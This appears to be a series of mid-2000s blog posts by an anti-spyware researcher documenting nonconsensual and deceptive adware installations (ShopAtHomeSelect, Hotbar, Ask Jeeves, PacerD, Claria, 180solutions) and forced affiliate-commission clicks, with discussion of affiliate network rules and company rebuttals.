SAHS may say these wrongful installations are the fault of its distributors. (SAHS offered that argument when PC Pitstop inquired as to SAHS bundling with porn videos.) But affiliate networks’ rules do not forgive wrongful installations merely because the installations were performed by others. To the contrary, affiliate networks set out high consent requirements which apply no matter who installs the software. Furthermore, with so many diverse wrongful installations over such an extended period, it’s clear that something is fundamentally wrong with SAHS’s installation methods; SAHS can’t escape responsibility by vague finger-pointing.

Update (September 9): Staff from SAHS have prepared a document (PDF) purporting to rebut my findings of nonconsensual and dubious installations of SAHS. In each instance, SAHS claims they weren’t really installed in the manner I describe, so they say I am “mistaken” as to my allegations. Let’s look at each of the types of installations I described, and review the evidence:

Tricky popups (PacerD specifically): I previously posted an analysis of PacerD’s installation, including a screenshot of new folders created by PacerD. SAHS correctly notes that there’s no new folder containing SAHS files. But the lack of a new Program Files folder doesn’t mean SAHS wasn’t installed; quite the contrary, SAHS was installed by PacerD. Furthermore, SAHS was installed into the c:Windows directory, where inexperienced users are unlikely to look for it, and where its files tend to become jumbled with other files. To document this installation, I have added two new screenshots to my SAHS write-up, showing newly-created SAHS files placed in my c:Windows directory. I also have on file a video, showing the installation of the PacerD ActiveX followed (without interruption in the video) by the creation of these files. I also have on file a packet log indicating the newly-installed copy of SAHS contacting SAHS servers. So my initial write-up was right and SAHS’s response is wrong: PacerD did indeed install SAHS — and it did so without mentioning SAHS in any EULA or other disclosure.

Large bundles with little or no disclosure (3D Flying Icons specifically): Here again, SAHS makes the same analytical error. My write-up reports lots of new folders (within c:Program Files) reflecting other programs becoming installed. SAHS didn’t add a folder to c:Program Files, so it didn’t come up in my Program Files screenshots. But SAHS absolutely was installed by 3D. In a video I made at the time (now also posted to my public site), I observed a SAHS installer created in c:Temp (1:44), and I saw SAHS program files in c:Windows at 2:43, in each instance bearing distinctive SAHS icons as well as typical SAHS filenames. So there can be no disputing that 3D installs SAHS.

Nonconsensual installations through security holes: The section above links to a particular single security exploit video, one of literally scores I have on file. My automated network log analysis, file-change, and registry-change analysis confirm that SAHS was installed in the course of that security exploit, and Ad-Aware logs say the same, but the video does not specifically show the installation. That’s not particularly surprising — SAHS installs can be silent, and I wasn’t specifically seeking to document SAHS installs when I made that video. But rather than worry about this single example from so many months back, let me take this opportunity to post a recent example, showing a nonconsensual SAHS installation I happened to receive just last month (August 2005). In this video, I view a page at highconvert.com (video at 0:05), receive a series of security exploits (0:20-0:30), browse my file system and diagnostic tools, and then get a popup indicating that SAHS has been installed (1:57) (screenshot). My packet log and change-logs also confirm the SAHS installation.

So where does this leave my claims of improper SAHS installations? Notwithstanding SAHS’s promises of legitimacy, there can be no doubt of SAHS becoming installed without consent. SAHS may not like to admit it, and SAHS produces intense rhetoric to deny it, but users with SAHS aren’t all “opt-in.” To the contrary, some SAHS users have SAHS just because they’re unlucky enough to get it foisted upon them. And contrary to SAHS’s claim that my findings are “incorrect,” I have ample proof of these nonconsensual SAHS installs.

 

Wrongful Operation – Forced Clicks

In addition to regulating installation methods, affiliate networks’ rules limit the ways in which affiliates may claim affiliate commissions. Commission Junction’s Publisher Code of Conduct prohibits claiming commissions on “non-end-user initiated events” — invoking affiliate links without an “affirmative end-user action.” LinkShare’s Shopping Technologies Addendum (PDF) lacks a corresponding prohibition of non-end-user initiated events, but LinkShare’s Affiliate Membership Agreement repeatedly calls for affirmative user actions as a necessary condition to earning commission. For example, LinkShare’s provision 1.1 says commissions are payable only for “users who activate the hyperlink” (emphasis added); the “users … activate” wording specifically contemplates a user taking an affirmative action, not merely a software program automatically opening a link. (Since LinkShare’s special Addendum lacks any provision to the contrary, these Agreement terms still apply.)

There are good reasons for these rules: Affiliate merchants often make substantial payments if an affiliate link is activated and a user makes a purchase. (For example, Dell could easily pay $10+ for a single purchase through a single link.) So software programs aren’t allowed to “click” on affiliate links automatically. Instead, users must actually show some interest in the links — protecting merchants from being asked to pay commissions when an affiliate did nothing to earn a fee.

Although applicable network rules require that clicks on affiliate links be affirmative and that such clicks actually be performed by users (not just by software), SAHS software opens affiliate links and claims commissions without users taking any specific action. See e.g. this SAHS-Dell video, showing a user requesting www.dell.com on a computer with SAHS installed. SAHS immediately redirects the user to its affiliate link to Dell (video at 0:06), and LinkShare affiliate cookies are created (0:08), all without a user affirmatively clicking on any SAHS affiliate link. See also a corresponding SAHS video for Buy.com, showing affiliate link being loaded (0:06) and cookies created (0:10), again without any user interaction.

So SAHS’s operation constitutes an apparent violation of applicable network rules — claiming affiliate commission without the required user click on an affiliate ad, seemingly contrary to network rules.

Affiliate Networks’ Motives

I began this piece with the claim that affiliate networks have allowed SAHS to remain in their networks, notwithstanding the violations set out above. Why?

One possibility is that the affiliate networks simply never noticed the violations. But that’s a suggestion I can’t accept. Consider the many articles above, each reporting wrongful installations. Much of this work received extensive media coverage, including discussions on industry sites of record. Furthermore, most of these findings can be verified easily using any ordinary PC. So affiliate networks can’t credibly claim ignorance of what was occurring.

More persuasive, in my view, is the theory that affiliate networks declined to punish SAHS because SAHS’s actions are profitable for affiliate networks. When an affiliate merchant pays a commission to an affiliate, that merchant must also pay a fee to the intermediary affiliate network. Commission Junction’s public pricing list reports that this fee is 30% — so for every $1 of commission paid to SAHS, CJ earns another $0.30. As a result, affiliate networks have clear financial incentives to retain even rogue affiliates. (Indeed, at the same time that adware has exploded to infect tens of millions of PCs, CJ and LinkShare are reporting unusually strong earnings. [1, 2])

I don’t want to overstate my worry of affiliate networks’ profit motivation. In recent months, affiliate networks have repeatedly kicked out long-time rule-breakers, even where the rule-breakers make money for the networks. (See e.g. LinkShare kicking out 180solutions, and CJ kicking out 180solutions, Direct Revenue and eXact Advertising.) But these actions generally only occur after an extended period of user and analyst outcry. (See e.g. my writing last summer about 180solutions’ effects on affiliate systems.) In contrast, to date, little attention has been focused on SAHS.

Update (October 14): Commission Junction has removed SAHS from its network, thereby ending SAHS’s relationships with all CJ merchants. No word on similar actions by LinkShare or Performics.

Merchants and Users as Victims

As shown in the example video linked above, SAHS claims affiliate commissions even when users specifically request merchants’ sites. Dell and Buy.com get no bona fide benefit from paying 1%-2% to SAHS, as shown in the videos above. SAHS might claim that it pays users rebates as a way to encourage their purchases from participating merchants. But when SAHS arrives on users’ PCs unrequested, and even without users’ acknowledgement or acceptance of its arrival, users are unlikely to be motivated to make purchases from SAHS-participating merchants. So it’s unclear what benefit SAHS can offer merchants under these circumstances.

Notwithstanding the problems with SAHS’s business, affiliate networks encourage merchants to make payments to SAHS by listing SAHS as an affiliate in good standing, inviting SAHS staff to conferences, and occasionally even giving awards to SAHS. Whether through these network actions or based on merchants’ own failure to diligently investigate, merchants bear the brunt of SAHS’s bad actions — paying out commissions SAHS has not properly earned under stated affiliate network rules.

Users also suffer from SAHS. As a result of the ill-gotten payments paid to SAHS by merchants, SAHS receives funds with which it can and does purchase additional installations from its software distribution partners (including the nonconsensual and tricky installations shown above). Payments from Dell (and other targeted merchants) ultimately help to fund the infection of more users — slowing down more users’ PCs, making more users’ PCs unreliable, and pouring fuel onto the spyware problem. To the extent that affected users respond by buying new PCs, Dell perhaps benefits indirectly — but I gather Dell does not aspire to fund such infections.

SAHS may claim that users benefit from its presence, even if its initial installation was improper. After all, SAHS claims affiliate commissions based on users’ purchases, and SAHS stands ready to refund a share of these commissions to the responsible users. But from the perspective of users who received SAHS without meaningful disclosures, SAHS’s offer is of dubious value. Where a program arrives unrequested, users’ fears of identity theft or fraud will (rightly!) discourage them from providing the personal information necessary to receive a payment (name, address, etc.). SAHS may be offering users legitimate actual payments — but when SAHS’s installation was nonconsensual in the first place, users have no easy way to distinguish SAHS’s offer from a phishing attempt or other scam. Without payment details, SAHS will simply retain users’ funds — giving users no benefit for the unrequested intrusion on their PCs, but giving SAHS extra profits.

This is an unfortunate situation — but it’s not hopeless. Dell, Buy.com, and other affected merchants need not continue to help fund this mess. LinkShare and Commission Junction need not continue to pass money to SAHS from unwitting merchants, nor need they continue taking 30% cuts for themselves. Stay tuned.

Update (September 13): News coverage discusses the problem of SAHS retaining commissions for users who never requested SAHS and never even registered for rebates. CJ claims that they have not confirmed “SAHS performing redirects on unregistered users,” but admits that this would be a “major violation.” I have provided CJ with screenshot and video proof, showing SAHS doing exactly that.

What’s So Hot About Hotbar? updated May 19, 2005

Last week Sunbelt announced that Hotbar sent Sunbelt a Cease and Desist letter, apparently demanding that Sunbelt stop detecting Hotbar software and offering users an option to remove it. I immediately updated my Threats page. But then I started wondering: How does Hotbar get onto users’ PCs? And what does Hotbar do once installed?

My new Hotbar Installs via Banner Ads at Kids Sites shows a variety of unsavory Hotbar practices: Promoting Hotbar advertising software at sites targeting kids, using banners with smiley faces but without mention of ads. Failing to affirmatively show a license agreement, and burying advertising terms so many screens into the license and below such counterintuitively-labeled section headings that users cannot reasonably find the key provisions. First affirmatively mentioning advertising on a screen that offers no Cancel button for users to decline the installation. And ultimately bombarding users with ads in pop-ups, web browser toolbars, Windows Explorer toolbars, auto-opening sidebars, and even desktop icons.

Meanwhile, Hotbar’s C&D indicates that their software is no longer detected by Microsoft Anti-Spyware, Lavasoft Ad-Aware, or McAfee. Why not? Consider Microsoft’s policy statement: “Windows AntiSpyware (Beta) alerts the user to the presence of any automatic pop-up advertising appearing outside the context of the program they are currently using.” This certainly describes Hotbar’s pop-up ads. Yet somehow Hotbar has caused — convinced? persuaded? threatened? — Microsoft not to detect their program.

Of course Hotbar is not the only party to blame. Hotbar’s ads arrive at kids sites through ads syndicated by Fastclick (NASDAQ: FSTC). As a publicly-traded company, surely Fastclick could find a better business than foisting advertising software onto unsuspecting kids.


I’ve recently received a copy of the Cease and Desist letter (PDF) Hotbar sent to Sunbelt. Sunbelt says they’ll be responding shortly, and I’m looking forward to reading their response. Meanwhile, some inaccuracies in the letter are so egregious that I feel obliged to note them immediately.

Hotbar claims to provide its users with “explicit explanations” of its services, and Hotbar therefore claims that users “provide … full conscious consent to each and every aspect of Hotbar software.” That’s not what I’ve seen when I’ve tested Hotbar. Rather, I have observed Hotbar install without even mentioning the word “ads” until a screen at which users aren’t given a “cancel” button. And nowhere does Hotbar affirmatively show users any mention of its numerous forms of ads (pop-ups, pop-unders, toolbar ads, auto-opening sidebars, and even desktop icons). To say Hotbar users “consent to each and every aspect” is truly a puzzling misstatement of the facts — that’s not what I’ve observed, nor is it what I’ve chronicled in screenshots and videos.

Hotbar then claims that Sunbelt “misrepresent[s]” Hotbar when it calls “Hotbar” adware. I don’t get it. How else is Sunbelt supposed to describe a program that tracks users’ online activities and shows ads, including pop-up ads? If Claria is adware — and even Claria says it is! — then surely Hotbar is properly called adware too. Perhaps reasonable people could disagree about the propriety of calling Hotbar spyware. But “adware”? No.

Does Jeeves Ask for Permission?

I continue my misleading installation series with a look at installation practices of Ask Jeeves. My new Ask Jeeves Toolbar Installs via Banner Ads at Kids Sites shows a misleading banner ad particularly likely to target kids. When users click on this banner, AJ neither shows nor references any license agreement. And AJ uses euphemisms like “accessible directly from your browser” rather than explicitly admitting that it will install a web browser toolbar.

But that’s not the worst of AJ’s practices. Over the past six months, I’ve captured a series of videos showing Ask Jeeves’ MyWay and MySearch software installed through security holes — without notice, disclosure, or consent. For example, in a video I made on March 12, I received more than a dozen different programs including the Ask Jeeves MySearch toolbar — without me ever requesting anything, and without me ever clicking “Yes” or “Accept” in any dialog box. Watch the video and see for yourself. Warning: The video is 16+ minutes long. Security exploit occurs at 6:00, and Ask Jeeves MySearch software is first seen at 15:50. In this same testing, I also received installation of 180solutions, multiple programs from eXact Advertising, the IBIS WebSearch toolbar, PeopleOnPage, ShopAtHomeSelect, SurfSideKick, WindUpdates, and many more. The underlying network transmissions show that the security exploit at issue was syndicated through the targetnet.com ad network — Mamma Media, publicly-traded on Nasdaq Small Cap.

I have other videos available upon request, including nonconsensual AJ installations dating back to November 2004. See also my November 2004 exploit video.

I’m surprised that Ask Jeeves allows these nonconsensual installations. Ask Jeeves is a publicly-traded company with a 10-digit valuation (slated to be acquired by InterActiveCorp for $1.85 billion). If Ask Jeeves staff made a serious effort to screen and supervise their distribution partners, they could prevent this kind of mess.


The biggest news last week was a lawsuit filed by the New York Attorney General’s office against Intermix Media, whose KeenValue, IncrediFind, and other programs show popup ads, add extra browser toolbars, and intercept error messages. These practices are objectionable in and of themselves, but the complaint focuses on the programs’ misleading installations. Sometimes the programs install with no notice at all, the complaint says, and sometimes only with hidden or misleading disclosures users are unlikely to notice or understand.

I have the sense that this suit is the first of many. There are certainly plenty of similar offenders, even big companies with major venture capital funding. I have often written about software from 180solutions, Direct Revenue, and eXact Advertising installing through security holes, practices I’ve continued to observe (including in the video linked above). And Claria’s tricky installations share many of the deceptive characteristics the AG attributes to Intermix, like hiding key terms in “lengthy, legalistic license agreements” and using “vague, incomplete” disclosure text. (See NYAG complaint (PDF), paragraph 9.) So I doubt the NY AG’s office would approve of the Ask Jeeves practices I’m documenting today, nor the other misleading tactics on my spyware installation methods index.

Misleading Installations of the Week: PacerD, and Claria’s Dope Wars

It’s Monday morning, so time for more misleading installations. Just like last week, I couldn’t stop at only a single example; again I’m providing two.

PacerD’s misleading pop-ups ask users to “please click yes” to accept “free browser enhancements.” In fact what PacerD offers is an unusually large bundle of a dozen different programs, only some of them disclosed in fine print in PacerD’s mislabeled (apparent, purported) license agreement, which in turn is only shown at a user’s specific request. But click “Yes” once, and your computer will take a turn for the worse, with no subsequent opportunity to cancel.

The PacerD Installation Bundle

As usual, Claria’s approach is somewhat more subtle. When Claria bundles its advertising software with the “Dope Wars” video game, Claria prominently tells users that it will deliver advertising. But Claria mentions effects on privacy only midway through a 43-page license agreement, that begins with three tedious pages of all-caps text. My sense is that few “Dope Wars” players are likely to wade through this lengthy license. So if Dope Wars users install Claria, they’ll do so without first understanding what Claria will do to their PCs.

Claria’s Misleading Installation Methods – Dope Wars

On some level, these two installations could hardly be more different. PacerD installs a dozen programs from numerous different companies; Claria installs just one. PacerD shows a popup while users are just trying to surf the web; Claria’s interruption comes as users are trying to install software they actually want. But in relevant respects, I think these installations are surprisingly similar. For one, both seek to convert users’ computers into advertising channels — tracking what users do, and showing extra advertising. Also, both installations tell users something about the programs they are asked to accept, and both give savvy users an opportunity to learn more, but in each case the prominent on-screen text omits important facts users need to know in order to make sensible choices.

Misleading Installations of the Week: Claria and 180 at Kids Sites

“Adware” companies say their businesses are predicated on user consent. (Claria: “… consumers who agree … “; 180: “permission-based … opt-in”). Notwithstanding, companies’ claims, there’s no doubt that this kind of advertising software is sometimes installed without consent. See the video I posted last year.

But what about those users who supposedly do consent to receive extra pop-ups? Why did they agree to receive extra advertising that so many other users seem to despise? My sense is that users often don’t understand what they’re getting — due to serious deficiencies in installation disclosures. In two new articles, I examine and analyze the installation procedures of Claria and 180, raising doubts as to whether users reasonably knew what would happen when they “accepted” these programs.

Ezone.com, a site targeting children, that nonetheless promotes 180solutions.Can we say that a user “consents” to an installation if the installation occurred after a user was presented with a misleading advertisement that looked like a Windows dialog box? If that advertisement was embedded within a site substantially catering to children? If that advertisement offered a feature known to be duplicative with software the user already has? If “authorizing” the installation required only that the user click on an ad, then click “Yes” once? If the program’s license agreement was shown to the user only after the user pressed “Yes”? These are the facts of recent installations of Claria software from ads at games site Ezone.com.

Details: Claria’s Misleading Installation Methods – Ezone.com

Turning to 180: Can we say that a user consents to an installation of advertising-display software where that installation is prominently described as removing advertisements? Where the installation description uses euphemisms like “show … sponsor websites” but never explicitly states that the program will show advertisements or pop-ups? Where the installation procedure never shows or even references a license agreement? And where all this occurs at sites catering to children?

Details: 180solutions’s Misleading Installation Methods – Ezone.com

Lots of companies want to take advantage of users who may be a bit confused, a bit naive, or a bit too quick to click yes. But where users are recruited at sites catering to children, where ads look like Windows messages, or where installation requests resort to misleading euphemisms, I’m not inclined to say that consumers “consent” to the resulting ads and to the resulting transmission of personal information.